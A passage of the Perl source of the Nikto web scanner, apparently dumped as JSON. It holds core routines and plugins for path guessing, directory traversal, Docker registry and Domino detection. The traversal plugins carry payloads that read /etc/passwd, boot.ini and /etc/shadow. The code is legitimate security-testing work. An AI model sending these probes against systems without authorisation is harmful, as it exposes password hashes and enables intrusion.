nprint(\"+ WARNING: Module JSON::PP missing. -Savedir and replay functionality cannot be used.\");\n    }\n    LW2::init_ssl_engine();\n    my ($avail, $lib, $ver) = LW2::ssl_is_available();\n    if (!$avail) {\n        nprint(\"+ WARNING: SSL: support not available.\");\n    }\n\n}\n\n#######################################################################\nsub version {\n    my %NIKTOFILES;\n    my @F = dirlist($CONFIGFILE{'PLUGINDIR'}, \"\");\n    foreach my $f (@F) { $NIKTOFILES{$f} = $CONFIGFILE{'PLUGINDIR'} . \"/\" . $f; }\n    @F = dirlist($CONFIGFILE{'DBDIR'}, \"\");\n    foreach my $f (@F) { $NIKTOFILES{$f} = $CONFIGFILE{'DBDIR'} . \"/\" . $f; }\n\n    nprint($VARIABLES{'DIV'});\n    nprint(\"$VARIABLES{'name'} Versions\");\n    nprint($VARIABLES{'DIV'});\n    nprint(\"File                               Version      Last Mod\");\n    nprint(\"-----------------------------      --------     ----------\");\n    nprint(\"Nikto main                         $VARIABLES{'version'}\");\n    nprint(\"LibWhisker                         $LW2::VERSION\");\n\n    foreach my $FILE (sort keys %NIKTOFILES) {\n        next if $FILE eq 'LW2.pm';\n        open(FI, \"<$NIKTOFILES{$FILE}\")\n          || die print STDERR \"+ ERROR: Unable to open '$NIKTOFILES{$FILE}': $@\\n\";\n        my @F = <FI>;\n        close(FI);\n        my @VERS = grep(/^#VERSION/, @F);\n        my @MODS = grep(/^# \\$Id:/,  @F);\n        chomp($VERS[0]);\n        chomp($MODS[0]);\n        my @modification = split(/ /, $MODS[0]);\n        $VERS[0] =~ s/^#VERSION,//;\n        my $ws1 = (35 - length($FILE));\n        my $ws2 = (13 - length($VERS[0]));\n        nprint(\"$FILE\" . \" \" x $ws1 . \"$VERS[0]\" . \" \" x $ws2 . \"$modification[4]\");\n    }\n    nprint($VARIABLES{'DIV'});\n\n    # Check dependencies\n    check_modules();\n\n    nprint($VARIABLES{'DIV'});\n\n    exit;\n}\n\n#######################################################################\nsub send_updates {\n    return if ($CONFIGFILE{'UPDATES'} !~ /yes|auto/i);\n    my (@MARKS) = @_;\n    my ($updated_version, $answer, $code, $upd_enc);\n    my $have_updates = 0;\n\n    foreach my $mark (@MARKS) {\n        foreach my $component (keys %{ $mark->{'components'} }) {\n            if ($mark->{'components'}->{$component} eq 2) {\n                if ($component !~ /\\d/) { next; }\n\t\telsif ($component =~ /^(?:\\(?Win32\\)?|Linux-Mandrake$)/) { next; }\n                elsif ($component eq \"\") { next; }\n                $have_updates = 1;\n                $updated_version .= \"$component \";\n            }\n        }\n    }\n\n    if ((!$have_updates) || ($updated_version eq \"\")) { return; }\n\n    $updated_version =~ s/\\s+$//;\n    $updated_version =~ s/^\\s+//;\n\n    if ($CONFIGFILE{'UPDATES'} eq \"auto\") {\n        $answer = \"y\";\n    }\n    else {\n        $answer = read_data(\n            \"\\n\n      *********************************************************************\n      Portions of the server's headers ($updated_version) are not in\n      the Nikto \" . $VARIABLES{'version'} . \" database or are newer than the known string. Would you like\n      to submit this information (*no server specific data*) to CIRT.net\n      for a Nikto update (or you may email to sullo\\@cirt.net) (y/n)? \", \"\"\n        );\n    }\n\n    if ($answer !~ /y/i) { return; }\n\n    # set up our mark\n    my %mark = ('ident' => '68.183.58.226',\n                'ssl'   => 1,\n                'port'  => 443\n                );\n\n    for (my $i = 0 ; $i <= $#ARGV ; $i++) {\n        if (($ARGV[$i] eq \"-u\") || ($ARGV[$i] eq \"-useproxy\")) {\n            $CLI{'useproxy'} = 1;\n            last;\n        }\n    }\n\n    ($mark{'hostname'}, $mark{'ip'}, $mark{'display_name'}) = resolve('68.183.58.226');\n\n    $upd_enc = LW2::encode_base64($updated_version);\n    chomp($upd_enc);\n    ($code, $content) = nfetch(\\%mark, \"/nikto-updates.php?version=$upd_enc\", \"GET\");\n\n    if ($code eq 407) {\n        if ($CONFIGFILE{PROXYUSER} eq \"\") {\n            $CONFIGFILE{PROXYUSER} = read_data(\"Proxy ID: \",   \"\");\n            $CONFIGFILE{PROXYPASS} = read_data(\"Proxy Pass: \", \"noecho\");\n        }\n    \t($code, $content) = nfetch(\\%mark, \"/nikto-updates.php?version=$upd_enc\", \"GET\");\n    }\n\n    if ($code eq \"\") {\n        LW2::http_close(\\%request);    # force-close any old connections\n        $mark{'ip'} = $CONFIGFILE{CIRT};\n        ($code, $content) = nfetch(\\%mark, \"/nikto-updates.php?version=$upd_enc\", \"GET\");\n    }\n\n    if ($code != 200) {\n\tnprint(\"+ ERROR: $code -> \" . $response->{'location'} .\"\\n+ ERROR: Update failed, please notify sullo\\@cirt.net of the previous line.\");\n\t}\n    elsif ($content !~ /SUCCESS/) {\n        nprint(\"+ ERROR: Unable to send update info to cirt.net. Here was the request result : Code: $code\\n$content\\n\");\n    }\n    else {\n        nprint(\"- Sent updated info to cirt.net -- Thank you!\");\n    }\n\n    return;\n}\n\n#######################################################################\nsub usage {\n    my $is_failure = shift;\n\n        print \"\n   Options:\n       -ask+               Whether to ask about submitting updates\n                               yes   Ask about each (default)\n                               no    Don't ask, don't send\n                               auto  Don't ask, just send\n       -Cgidirs+           Scan these CGI dirs: \\\"none\\\", \\\"all\\\", or values like \\\"/cgi/ /cgi-a/\\\"\n       -config+            Use this config file\n       -Display+           Turn on/off display outputs:\n                               1     Show redirects\n                               2     Show cookies received\n                               3     Show all 200/OK responses\n                               4     Show URLs which require authentication\n                               D     Debug output\n                               E     Display all HTTP errors\n                               P     Print progress to STDOUT\n                               S     Scrub output of IPs and hostnames\n                               V     Verbose output\n       -dbcheck           Check database and other key files for syntax errors\n       -evasion+          Encoding technique:\\n\";\n\n        foreach my $k (sort keys %{ $NIKTO{'anti_ids'} }) {\n            print \"                               $k     $NIKTO{'anti_ids'}{$k}\\n\";\n        }\n\n        print \"       -Format+           Save file (-o) format:\n                               csv   Comma-separated-value\n                               json  JSON Format\n                               htm   HTML Format\n                               nbe   Nessus NBE format\n                               sql   Generic SQL (see docs for schema)\n                               txt   Plain text\n                               xml   XML Format\n                               (if not specified the format will be taken from the file extension passed to -output)\n       -Help              This help information\n       -host+             Target host/URL\n       -404code           Ignore these HTTP codes as negative responses (always). Format is \\\"302,301\\\".\n       -404string         Ignore this string in response body content as negative response (always). Can be a regular expression.\n       -id+               Host authentication to use, format is id:pass or id:pass:realm\n       -key+              Client certificate key file\n       -list-plugins      List all available plugins, perform no testing\n       -maxtime+          Maximum testing time per host (e.g., 1h, 60m, 3600s)\n       -mutate+           Guess additional file names:\\n\";\n\n        foreach my $k (sort keys %{ $NIKTO{'mutate_opts'} }) {\n            print \"                               $k     $NIKTO{'mutate_opts'}{$k}\\n\";\n        }\n\n        print \"       -mutate-options    Provide information for mutates\n       -nointeractive     Disables interactive features\n       -nolookup          Disables DNS lookups\n       -nossl             Disables the use of SSL\n       -no404             Disables nikto attempting to guess a 404 page\n       -Option            Over-ride an option in nikto.conf, can be issued multiple times\n       -output+           Write output to this file ('.' for auto-name)\n       -Pause+            Pause between tests (seconds)\n       -Plugins+          List of plugins to run (default: ALL)\n       -port+             Port to use (default 80)\n       -RSAcert+          Client certificate file\n       -root+             Prepend root value to all requests, format is /directory\n       -Save              Save positive responses to this directory ('.' for auto-name)\n       -ssl               Force ssl mode on port\n       -Tuning+           Scan tuning:\n                               1     Interesting File / Seen in logs\n                               2     Misconfiguration / Default File\n                               3     Information Disclosure\n                               4     Injection (XSS/Script/HTML)\n                               5     Remote File Retrieval - Inside Web Root\n                               6     Denial of Service\n                               7     Remote File Retrieval - Server Wide\n                               8     Command Execution / Remote Shell\n                               9     SQL Injection\n                               0     File Upload\n                               a     Authentication Bypass\n                               b     Software Identification\n                               c     Remote Source Inclusion\n                               d     WebService\n                               e     Administrative Console\n                               x     Reverse Tuning Options (i.e., include all except specified)\n       -timeout+          Timeout for requests (default 10 seconds)\n       -Userdbs           Load only user databases, not the standard databases\n                               all   Disable standard dbs and load only user dbs\n                               tests Disable only db_tests and load udb_tests\n       -useragent         Over-rides the default useragent\n       -until             Run until the specified time or duration\n       -update            Update databases and plugins from CIRT.net\n       -url+              Target host/URL (alias of -host)\n       -useproxy          Use the proxy defined in nikto.conf, or argument http://server:port\n       -Version           Print plugin and database versions\n       -vhost+            Virtual host (for Host header)\n   \t\t+ requires a value\\n\\n\";\n\n    check_modules();\n\n    exit $is_failure;\n}\n\n#######################################################################\nsub init_db {\n    my $dbname   = $_[0];\n    my $filename = \"$CONFIGFILE{'DBDIR'}/\" . $dbname;\n    my (@dbarray, @headers);\n    my $hashref = {};\n\n    if ($CLI{'userdbs'} ne 'all') {\n\n        # Check that the database exists\n        unless (open(IN, \"<$filename\")) {\n            nprint(\"+ ERROR: Unable to open database file $dbname: $@.\");\n            return $dbarray;\n        }\n\n        # Now read the header values\n        while (<IN>) {\n            chomp;\n            s/\\#.*$//;\n            if ($_ eq \"\") { next }\n            unless (@headers) {\n                @headers = parse_csv($_);\n            }\n            else {\n\n                # contents; so split them up and apply to hash\n                my @contents = parse_csv($_);\n                my $hashref  = {};\n                for (my $i = 0 ; $i <= $#contents ; $i++) {\n                    $hashref->{ $headers[$i] } = $contents[$i];\n                }\n                push(@dbarray, $hashref);\n            }\n        }\n        close(IN);\n    }\n\n    # And the udb_* file\n    $filename = \"$CONFIGFILE{'DBDIR'}/u\" . $dbname;\n    if (open(IN, \"<$filename\")) {\n        while (<IN>) {\n            chomp;\n            s/\\#.*$//;\n            if ($_ eq \"\") { next; }\n\n            # contents; so split them up and apply to hash\n            my @contents = parse_csv($_);\n            my $hashref  = {};\n            for (my $i = 0 ; $i <= $#contents ; $i++) {\n                $hashref->{ $headers[$i] } = $contents[$i];\n            }\n            push(@dbarray, $hashref);\n        }\n    }\n    close(IN);\n\n    return \\@dbarray;\n}\n\n#######################################################################\nsub add_vulnerability {\n    my ($mark, $message, $nikto_id, $osvdb, $method, $uri, $request, $response, $reason) = @_;\n    $uri    = \"/\"   unless (defined $uri);\n    $method = \"GET\" unless (defined $method);\n    $osvdb  = \"0\"   unless (defined $osvdb);\n\n    # check to see if we've alerted already (can be from content search, etc.)\n    foreach my $r (@RESULTS) {\n        if (   ($uri                       eq $r->{'uri'})\n            && ($message                   eq $r->{'message'})\n            && ($method                    eq $r->{'method'})\n            && (${ $r->{'mark'} }{'ident'} eq $mark->{'ident'})\n            && (${ $r->{'mark'} }{'port'}  eq $mark->{'port'})) {\n            return;\n        }\n    }\n\n    my $result = \"\";\n    if (defined $_[7]) {\n        $result = $_[7]->{'whisker'}->{'data'};\n    }\n\n    my $resulthash;\n    %$resulthash = (mark     => $mark,\n                    message  => $message,\n                    nikto_id => $nikto_id,\n                    osvdb    => $osvdb,\n                    method   => $method,\n                    uri      => $response->{whisker}->{uri_requested} || '/',\n                    result   => $result,\n                    request  => $request,\n                    response => $response,\n                    reason   => $reason,\n                    );\n\n    push(@RESULTS, $resulthash);\n    $mark->{total_vulns}++;\n\n    unless (($osvdb eq \"0\") || ($osvdb eq \"\")) {\n        $message = \"OSVDB-$osvdb: $message\";\n    }\n    nprint(\"+ $message\");\n\n    # Save it\n    if ($CLI{'saveresults'} ne '') {\n        save_item($resulthash, $message, $request, $response);\n    }\n\n    # Now report it\n    report_item($mark, $resulthash);\n}\n\n###############################################################################\nsub list_plugins {\n\n    # Just do a load_plugins, then loop through the array and print out name,\n    # description and copyright\n\n    load_plugins();\n\n    foreach my $plugin (@PLUGINS) {\n        nprint(\"Plugin: $plugin->{'name'}\");\n        push(@all_names, $plugin->{'name'});\n        nprint(\" $plugin->{'full_name'} - $plugin->{'description'}\");\n        nprint(\" Written by $plugin->{'author'}, Copyright (C) $plugin->{'copyright'}\");\n        if (defined $plugin->{'options'}) {\n            nprint(\" Options:\");\n            while (my ($option, $description) = each(%{ $plugin->{'options'} })) {\n                nprint(\"  $option: $description\");\n            }\n        }\n        nprint(\"\\n\");\n    }\n\n    # Plugin macros\n    nprint(\"Defined plugin macros:\");\n\n    foreach my $macro (keys %CONFIGFILE) {\n        if ($macro =~ /^@@/) {\n            nprint(\" $macro = \\\"\" . $CONFIGFILE{$macro} . \"\\\"\");\n            if ($CONFIGFILE{$macro} =~ /@@/) {\n                nprint(\"  (expanded) = \\\"\" . expand_pluginlist($CONFIGFILE{$macro}, 0) . \"\\\"\");\n            }\n        }\n    }\n\n    exit(0);\n}\n\n###############################################################################\n# This is overly complicated and jumps a lot between scalars and arrays. The REs are\n# probably dodgy, but it works! W00!\nsub expand_pluginlist {\n    my ($pluginlist, $parent) = @_;\n\n    my @macros;\n    foreach my $config (keys %CONFIGFILE) {\n        if ($config =~ /^@@/) {\n            push(@macros, $config);\n        }\n    }\n\n    # Now loop through each member of the list and expand it\n    my $count       = 0;\n    my $npluginlist = $pluginlist;\n    do {\n        $count++;\n        my @raw = split(/;/, $npluginlist);\n\n        # cooked contains the processed list\n        my @cooked;\n        foreach my $entry (@raw) {\n\n            # Is it +; if so remap to @@DEFAULT\n            if ($entry eq \"+\") {\n                $entry = '@@DEFAULT';\n            }\n\n            # result contains the processed entry\n            my $result = $original = $entry;\n\n            # Is it a macro\n            if ($entry =~ /^-?@@/) {\n\n                # break up into components\n                $prefix = ($entry =~ /^-/) ? \"-\" : \"\";\n                $name = $suffix = $entry;\n                $name   =~ s/(^-?)(@@[[:alpha:]]+)(\\(?.*\\)?$)/$2/;\n                $suffix =~ s/(.*)(\\(.*\\))/$2/;\n                if ($suffix eq $entry) {\n                    $suffix = \"\";\n                }\n                foreach my $macro (@macros) {\n                    if ($entry =~ /-?$macro/) {\n\n                        # It's a macro, so replace the contents with the macro\n                        # Add prefix and suffix to each member of the macro\n                        my @temp;\n                        foreach my $child (split(/;/, $CONFIGFILE{$macro})) {\n                            push(@temp, \"$prefix$child$suffix\");\n                        }\n                        $result = join(';', @temp);\n\n                        # stop an infinite loop\n                        last;\n                    }\n                }\n            }\n            if ($result =~ /^-?@@/ && $result eq $original) {\n\n                # macro not found or is itself - ignore\n                $result = \"\";\n            }\n            if ($count > 100) {\n\n                # check for recurstion\n                nprint(\"ERROR: Recursion found whilst expanding macros\");\n                $result = \"\";\n                last;\n            }\n            push(@cooked, $result);\n        }\n        $npluginlist = join(';', @cooked);\n    } while ($npluginlist =~ /@@/ && $count <= 100);\n\n    #use re 'debug';\n    # Now we've expanded out macros, deal with duplicates and -\n    my @raw = split(/;/, $npluginlist);\n\n    # hash so we don't have to mess with duplicates\n    my %cooked;\n    foreach my $plugin (@raw) {\n\n        # break out components\n        my $minus;\n        my $name = my $suffix = $plugin;\n        $minus = (substr($plugin, 0, 1) eq '-');\n        $name   =~ s/(^-?)([^\\(]+)(\\(?.*\\)?$)/$2/;\n        $suffix =~ s/(.*)(\\(.*\\))/$2/;\n        if ($suffix eq $plugin) {\n            $suffix = \"\";\n        }\n\n        #nprint(\"P:$plugin M:$minus N:$name S:$suffix\");\n        if ($minus) {\n\n            # it's a minus - remove any previous entry\n            if (exists $cooked{$name}) {\n                delete $cooked{$name};\n            }\n        }\n        else {\n\n            # else add it with the parameters as the value of the hash\n            $cooked{$name} = $suffix;\n        }\n    }\n\n    # Now rejoin into one happy whole\n    my $output;\n    foreach my $plugin (keys %cooked) {\n        $output .= \"$plugin\" . $cooked{$plugin} . \";\";\n    }\n\n    # remove the last ;\n    $output =~ s/;$//g;\n\n    return $output;\n}\n###############################################################################\n# Check a regex for validation & fix. If mode=1, return a flag which indicates\n# whether the regex was changed\nsub validate_and_fix_regex {\n    my $regex = $_[0];\n    my $mode  = $_[1] || 0;\n    my $fixed = 0;\n    eval { qr/$regex/ };\n    if ($@) {\n        $fixed = 1;\n        $regex = rquote($regex);\n    }\n    if ($mode) { return $regex, $fixed; }\n    return $regex;\n}\n###############################################################################\nsub rquote {\n    my $string = $_[0] || return;\n    $string =~ s/([^A-Za-z_0-9 \"'\\\\])/\\\\$1/g;\n    return $string;\n}\n###############################################################################\nsub gmt_offset {\n    my @t = localtime(time);\n    return (timegm(@t) - timelocal(@t)) / 3600;\n}\n###############################################################################\nsub expand_range {\n\tlocal $\" = '..';\n    my (@range);\n\n\tsort {$a <=> $b}\n\t\tmap {\n\t\t\tmap {\n\t\t\t\t((@range = split /-/) == 2) ? eval('map {$_} '. \"@range\") : $_\n\t\t\t} split /\\s/\n\t\t} @_;\n}\n###############################################################################\nsub nikto_core { return; }    # trap for this plugin being called to run. lame.\n###############################################################################\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_dictionary_attack.plugin",
    "content": "#VERSION,2.04\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Run dictionary tests\n###############################################################################\nsub nikto_dictionary_attack_init {\n    my $id = { name        => \"dictionary\",\n               full_name   => \"Dictionary attack\",\n               author      => \"Tautology\",\n               description => \"Attempts to dictionary attack commonly known directories/files\",\n               hooks       => {\n                          recon => { method => \\&nikto_dictionary_attack,\n                                     weight => 20,\n                                     },\n                            },\n               options     => {\n                          dictionary => \"Dictionary of paths to look for.\",\n                          method => \"Method to use to enumerate.\",\n                          },\n               copyright => \"2009 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_dictionary_attack {\n    return if $mark->{'terminate'};\n    my ($mark, $parameters) = @_;\n\n    my $method=\"HEAD\";\n\n    my $dictfile = \"\";\n    if (   defined $parameters\n        && defined $parameters->{'dictionary'}) {\n        $dictfile = $parameters->{'dictionary'};\n    }\n    elsif (defined($CLI{'mutate-options'})) {\n        $dictfile = $CLI{'mutate-options'};\n    }\n    else {\n        nprint(\"- No dictionary file given in plugin options, skipping check\", \"v\");\n        return;\n    }\n\n    if (   defined $parameters\n        && defined $parameters->{'method'}) {\n        $method=$parameters->{'method'};\n    }\n    my $ctr = 0;\n\n    if (!defined $dictfile) {\n        nprint(\"- No dictionary file given in mutate-options, skipping check\");\n        return;\n    }\n\n    # Record the host for future use\n    my $host = $mark->{'hostname'};\n\n    nprint(\"- Guessing directories/files (using dictionary $dictfile).\", \"v\");\n    unless (open(IN, \"<$dictfile\")) {\n        nprint(\"+ ERROR: Unable to open dictionary file $dictfile: $!.\");\n    }\n\n    # Now attempt on each entry\n    while (<IN>) {\n        return if $mark->{'terminate'};\n        chomp;\n        s/\\#.*$//;\n        next if ($_ eq \"\");\n        my $dir = $_;\n        if (($ctr % 100) == 0) { nprint(\"- File enumeration guess $ctr ($dir): /$dir/\", \"v\"); }\n        my ($code, $content, $error, $request, $response) = nfetch($mark, \"/$dir\", \"${method}\", \"\", \"\", \"\", \"dictionary_attack\");\n        foreach my $found (split(/ /, $VARIABLES{\"\\@HTTPFOUND\"})) {\n\n            if ($code eq $found) {\n                add_vulnerability($mark, \"Found file /$dir\", 999969, \"0\", \"HEAD\", \"/$dir\", $request, $response);\n            }\n        }\n        $ctr++;\n    }\n    close(IN);\n}    # End sub\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_dir_traversal.plugin",
    "content": "#VERSION,2.1.6\n###############################################################################\n#  Copyright (C) 2016 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check applications / servers for directory traversal vulnerabilities\n###############################################################################\nsub nikto_dir_traversal_init {\n    my $id = { name        => \"dir_traversal\",\n               full_name   => \"Directory Traversal\",\n               author      => \"RealRancor\",\n               description => \"Check applications / servers for directory traversal vulnerabilities.\",\n               hooks       => { scan => { method => \\&nikto_dir_traversal, },\n                                start => { method => \\&nikto_dir_traversal_load, },\n                              },\n               copyright   => \"2016 Chris Sullo\"\n               };\n    use vars qw/$DIRTRAVERSALDB/;\n    return $id;\n}\n\nsub nikto_dir_traversal_load {\n    # load up the database here so we don't redo it each time\n    $DIRTRAVERSALDB = init_db(\"db_dir_traversal\");\n\n    %TRAVWIN={};\n    $TRAVWIN{'boot.ini'} = '\\[boot loader\\]';\n    $TRAVWIN{'winnt/win.ini'} = '; for 16-bit app support';\n    $TRAVWIN{'windows/win.ini'} = '; for 16-bit app support';\n\n    %TRAVLIN={};\n    $TRAVLIN{'etc/passwd'} = 'root:.*:0:[01]:';\n    $TRAVLIN{'etc/hosts'} = '127\\.0\\.0\\.1.*localhost';\n\n    %TRAVALL={};\n    $TRAVALL{'boot.ini'} = '\\[boot loader\\]';\n    $TRAVALL{'winnt/win.ini'} = '; for 16-bit app support';\n    $TRAVALL{'windows/win.ini'} = '; for 16-bit app support';\n    $TRAVALL{'etc/passwd'} = 'root:.*:0:[01]:';\n    $TRAVALL{'etc/hosts'} = '127\\.0\\.0\\.1.*localhost';\n}\n\nsub nikto_dir_traversal {\n    # load mark from plugin caller\n    my ($mark) = @_;\n\n    # quit if user is terminating - this is a catch all and we should never execute it\n    return if $mark->{'terminate'};\n\n    foreach my $item (@$DIRTRAVERSALDB) {\n        # $item will contain the entry in db_dir_traversal, made into a hash pointer\n\n        # Check if the user is terminating the current mark\n        return if $mark->{'terminate'};\n\n        # Set up URI\n        my $uri = \"/$item->{'file'}\";\n\n        # Check / replace placeholder with pattern\n        if ($uri =~ \"\\@TRAVWIN\") {\n            dir_trav_check(TRAVWIN, $item, $uri, $mark);\n        } elsif ($uri =~ \"\\@TRAVLIN\") {\n            dir_trav_check(TRAVLIN, $item, $uri, $mark);\n        } elsif ($uri =~ \"\\@TRAVALL\") {\n            dir_trav_check(TRAVALL, $item, $uri, $mark);\n        } else {\n            next;\n        }\n    }\n}\n\nsub dir_trav_check {\n    my $type = $_[0] || return;\n    my $item = $_[1] || return;\n    my $uri = $_[2] || return;\n    my $mark = $_[3] || return;\n\n    for my $key (keys %{$type}) {\n        my $value = ${$type}{$key};\n        (my $newuri = $uri) =~ s/\\@$type/$key/;\n        # Fetch the URI, we use nfetch to ensure that auth, headers etc are taken into account\n        my ($res, $content, $request, $response) = nfetch($mark, $newuri, \"GET\", \"\", \"\", \"\", \"Directory traversal check\");\n        if ($content =~ /$value/) {\n            # Looks like a match - raise this up to the front end\n            add_vulnerability(\n                $mark,                                     # mark structure to identify target\n                \"$newuri: $item->{'description'}\",         # message\n                $item->{'nikto_id'},                       # tid\n                $item->{'osvdb_id'},                       # OSVDB reference\n                $newuri,                                   # URI\n                $request,                                  # Request structure for full output\n                $response);                                # Response structure for full output\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_dishwasher.plugin",
    "content": "#VERSION,2.20\n###############################################################################\n#  Copyright (C) 2017 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check for the Miele Professional PG 8528 directory traversal vulnerability\n###############################################################################\nsub nikto_dishwasher_init {\n    my $id = { name        => \"dishwasher\",\n               full_name   => \"dishwasher\",\n               author      => \"Jeremy Bae\",\n               description => \"Look for the dishwasher directory traversal vulnerability.\",\n               hooks       => { scan => { method => \\&nikto_dishwasher, weight => 20 }, },\n               copyright   => \"2017 Chris Sullo\",\n             };\n\n    return $id;\n}\n\nsub nikto_dishwasher {\n    my ($mark, $parameters) = @_;\n    my $path = \"/../../../../../../../../../../../../etc/shadow\";\n\n    my ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"dishwasher\");\n\n    if (($response->{'server'} =~ 'PST10 WebServer') && ($content =~ 'root:\\$1\\$.*')) {\n        add_vulnerability($mark, \"$path: Site appears vulnerable to the dishwasher directory traversal vulnerability.\", 999951, 0, \"GET\", $path, $request, $response);\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_docker_registry.plugin",
    "content": "#VERSION,2.20\n###############################################################################\n#  Copyright (C) 2018 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check for the Docker Registry\n###############################################################################\nsub nikto_docker_registry_init {\n    my $id = { name        => \"docker_registry\",\n               full_name   => \"docker_registry\",\n               author      => \"Jeremy Bae\",\n               description => \"Look for the docker registry\",\n               hooks       => { scan => { method => \\&nikto_docker_registry, weight => 20 }, },\n               copyright   => \"2018 Chris Sullo\",\n             };\n\n    return $id;\n}\n\nsub nikto_docker_registry {\n    my ($mark, $parameters) = @_;\n    my $path = \"/v2/_catalog\";\n\n    my ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"\");\n\n    if (defined($response->{'docker-distribution-api-version'})) {\n        add_vulnerability($mark, \"$path: This is the Docker Registry server. This might be interesting...\", 999952, 0, \"GET\", $path, $request, $response);\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_domino.plugin",
    "content": "#VERSION,2.1.6\n###############################################################################\n#  Copyright (C) 2016 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Perform IBM/Lotus Domino specific tests to identify files\n# accessible without authentication and the version of the server\n# TBD: Also report files with authentication?\n###############################################################################\nsub nikto_domino_init {\n    my $id = { name        => \"domino\",\n               full_name   => \"IBM/Lotus Domino Specific Tests\",\n               author      => \"RealRancor\",\n               description => \"Performs a selection of IBM/Louts Domino specific tests to identify Domino specific files accessible without authentication and the version of the server\",\n               hooks       => { scan => { method => \\&nikto_domino, },\n                                start => { method => \\&nikto_domino_load, },\n                              },\n               copyright   => \"2016 Chris Sullo\"\n               };\n    use vars qw/$DOMINODB/;\n    return $id;\n}\n\nsub nikto_domino_load {\n    # load up the database here so we don't redo it each time\n    $DOMINODB = init_db(\"db_domino\");\n}\n\nsub nikto_domino {\n    # load mark from plugin caller\n    my ($mark) = @_;\n    my ($ver, $tmpver, $finaluri, $finalmark, $finalreq, $finalres);\n\n    # quit if user is terminating - this is a catch all and we should never execute it\n    return if $mark->{'terminate'};\n\n    # check domcfg.nsf which should be always there\n    my ($res, $content, $error, $request, $response) = nfetch($mark, \"/domcfg.nsf\", \"GET\", \"\", \"\", \"\", \"Domino detection\");\n    my $is_domino=0;\n\n    # Detect IBM/Lotus Domino from banner\n    if (($mark->{'banner'} =~ /lotus(-| )domino/i) || ($response->{'server'} =~ /lotus(-| )domino/i)) {\n        $is_domino=1;\n    }\n\n    # Detect IBM/Lotus Domino from domcfg.nsf\n    if ($res eq \"200\" && $content =~ /src=\"\\/domcfg.nsf\\// && ($content =~ /self._domino_name/ || $content =~ /Web\\sServer\\sConfiguration/)) {\n        $is_domino=1;\n    }\n\n    # Detect IBM/Lotus Domino from login page\n    foreach my $uri ('/admin.nsf','/admin4.nsf','/admin5.nsf','/webadmin.nsf') {\n        ($res, $content, $error, $request, $response) = nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"Domino detection\");\n        if ($res eq \"200\" && (($content =~ /<title>Server\\sLogin</i && $content =~ /name=\"password\"/) || ($content =~ /self._domino_name/ && $content =~ /NotesView/))) {\n            $is_domino=1;\n            add_vulnerability($mark, \"$uri: Domino login page found.\", 520275, 523,\n                $uri, $request, $response);\n        }\n    }\n\n    # check nonexistent .nsf file for error message\n    ($res, $content, $error, $request, $response) = nfetch($mark, \"/nonexistent.nsf\", \"GET\", \"\", \"\", \"\", \"Domino detection\");\n    if ($res eq \"404\" && $content =~ /HTTP\\sWeb\\sServer:\\sIBM\\sNotes\\sException\\s-\\sFile\\sdoes\\snot\\sexist/) {\n        $is_domino=1;\n    }\n\n    if (!$is_domino) { return; }\n\n    nprint(\"+ IBM/Lotus Domino: Server detected based on banner or nsf 